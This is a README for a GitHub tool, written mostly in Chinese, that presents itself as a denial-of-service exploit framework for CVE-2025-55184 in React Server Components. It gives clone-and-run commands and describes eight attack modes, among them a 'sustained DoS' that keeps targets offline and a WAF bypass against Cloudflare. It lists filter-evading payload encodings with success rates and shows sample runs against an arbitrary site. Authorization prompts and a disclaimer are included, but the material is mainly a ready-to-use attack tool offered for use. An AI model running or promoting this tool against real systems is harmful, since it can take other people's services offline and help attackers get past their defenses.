专业级拒绝服务(DoS)利用框架,针对CVE-2025-55184,目标为React服务器组件。具备8种攻击模式、WAF绕过以及10多种有效载荷变体,适用于授权安全测试和漏洞赏金狩猎。
CVE-2025-55184 是一个影响 React 服务器组件(RSC)实现的高严重性拒绝服务(DoS)漏洞。远程攻击者可通过特制的循环引用载荷造成完全的服务中断。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2025-55184 |
| CVSS 评分 | 7.5(高) |
| 攻击向量 | 网络(远程) |
| 复杂度 | 低 |
| 所需权限 | 无(无需认证) |
| 影响 | 完全拒绝服务,资源耗尽 |
这不仅仅是一个基础的 PoC——它是一个专为严肃安全研究人员和漏洞赏金猎人设计的专业级利用框架。
git clone https://github.com/CyberTechAjju/CVE-2025-55184-POC-Expolit.git
cd CVE-2025-55184-POC-Expolit
./run.sh
就这样!依赖自动安装,交互式菜单引导您操作。
# Python directly
python3 exploit.py
# Advanced CLI mode
python3 cve_2025_55184_exploit.py -t <target> -m scan
| 模式 | 描述 | 使用场景 |
|---|---|---|
| 1. 检测 | 被动指纹识别 | 安全侦察 |
| 2. 扫描 | 主动漏洞测试 | 确认 |
| 3. 单次 | 一次性 PoC | 快速演示 |
| 4. 多线程 | 多线程(5 线程) | 中等强度测试 |
| 5. 激进 | 高影响(10+ 线程) | 授权渗透测试 |
| 6. WAF | WAF 检测与绕过 | 受保护目标 |
| 7. 报告 | 生成文档 | 漏洞赏金提交 |
| 8. 持续 | 🔥 新增! 持续 DoS | 使目标保持瘫痪! |
./run.sh
# Choose: 3 (SUSTAINED ATTACK)
# ✅ Target goes DOWN and STAYS DOWN
# ✅ Press Ctrl+C → Target RECOVERS automatically
适用于:
自动检测的 WAF:
规避技术:
正在寻找 CVE-2025-55182 利用方法?请观看此视频:
▶️ 在 YouTube 上观看:CVE-2025-55182 利用
╔══════════════════════════════════════════════════════════╗
║ ║
║ ______ ________ _____ ___ ___ ║
║ / ____/ / ____/ / / __ \ / _ \ / _ \ ║
║ / / __ / /_ / / \__ \ / / /_\ / /_\ \ ║
║ / /__ / \ /___/ / /___ ___/ /_/\__ /\__ / ║
║ \____/ /_____/______//____/ /_/ /_/ ║
║ ║
║ by CyberTechAjju | "KEEP LEARNING KEEP HACKING" ║
╚══════════════════════════════════════════════════════════╝
⚡ LIVE ATTACK DASHBOARD ⚡
┌─────────────────────────────────────────────────┐
│ Total Requests │ 847 │ ✓ │
│ Successful Attacks │ 521 │ 💥 │
│ Timeouts │ 521 │ ⏱️ │
│ Errors │ 326 │ ❌ │
│ Success Rate │ 61.5% │ 🎯 │
└─────────────────────────────────────────────────┘
./run.sh
Enter target: http://localhost:3000
Choose: 1 (Quick Scan)
Authorization: YES I AM AUTHORIZED
# Results in seconds!
./run.sh
Enter target: http://vulnerable-site.com
Choose: 3 (SUSTAINED ATTACK)
Authorization: YES I AM AUTHORIZED
Type: ATTACK
# Target goes down
# Monitor impact
# Press Ctrl+C when done
# Target recovers automatically!
./run.sh
Enter target: https://protected.cloudflare.com
Choose: 4 (WAF Bypass)
# Auto-detects Cloudflare
# Tries encoding variations
# Shows bypass success/failure
本工具包含 10 种以上利用变体:
| 载荷类型 | 编码方式 | 成功率 | 描述 |
|---|---|---|---|
| 基础 | 无 | 95% | 原始循环引用 |
| URL 编码 | URL | 80% | 绕过简单过滤器 |
| Base64 | Base64 | 75% | 规避模式匹配 |
| 双重 URL | 2x URL | 70% | 高级 WAF 绕过 |
| Unicode | Unicode | 65% | 字符编码规避 |
| Hex | 十六进制 | 60% | 十六进制转义序列 |
| 混合 | 多种 | 55% | 组合技术 |
| 分段 | 拆分 | 50% | 基于分段的绕过 |
| 嵌套 | 无 | 85% | 更深递归 |
| 基于数组 | 无 | 70% | 数组循环引用 |
✅ 授权提示 – 每次攻击前必须输入“YES I AM AUTHORIZED”
✅ 法律警告 – 启动时显示清晰指南
✅ 优雅关机 – 按 Ctrl+C 干净停止,允许目标恢复
✅ 速率限制 – 可配置延迟防止意外损害
✅ 范围验证 – 配置中的授权域名列表
✅ 全面日志 – 所有操作均记录以备问责
🚨 AUTHORIZED USE ONLY 🚨
This tool is designed EXCLUSIVELY for:
✅ Authorized penetration testing with written permission
✅ Bug bounty programs within defined scope
✅ Security research in controlled environments
✅ Educational purposes on your own infrastructure
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
The author (CyberTechAjju) assumes NO responsibility for:
❌ Misuse of this tool
❌ Unauthorized testing or attacks
❌ Damage to systems or services
❌ Legal consequences from improper use
By using this tool, you agree to:
✓ Obtain explicit written authorization before testing
✓ Comply with all applicable laws and regulations
✓ Follow responsible disclosure practices
✓ Use only for legitimate security research
适用于专业漏洞赏金猎杀:
graph LR
A[Recon] --> B[Detect Mode]
B --> C[Scan Mode]
C --> D[Confirm Vuln]
D --> E[Generate Report]
E --> F[Submit]
F --> G[Reward! 💰]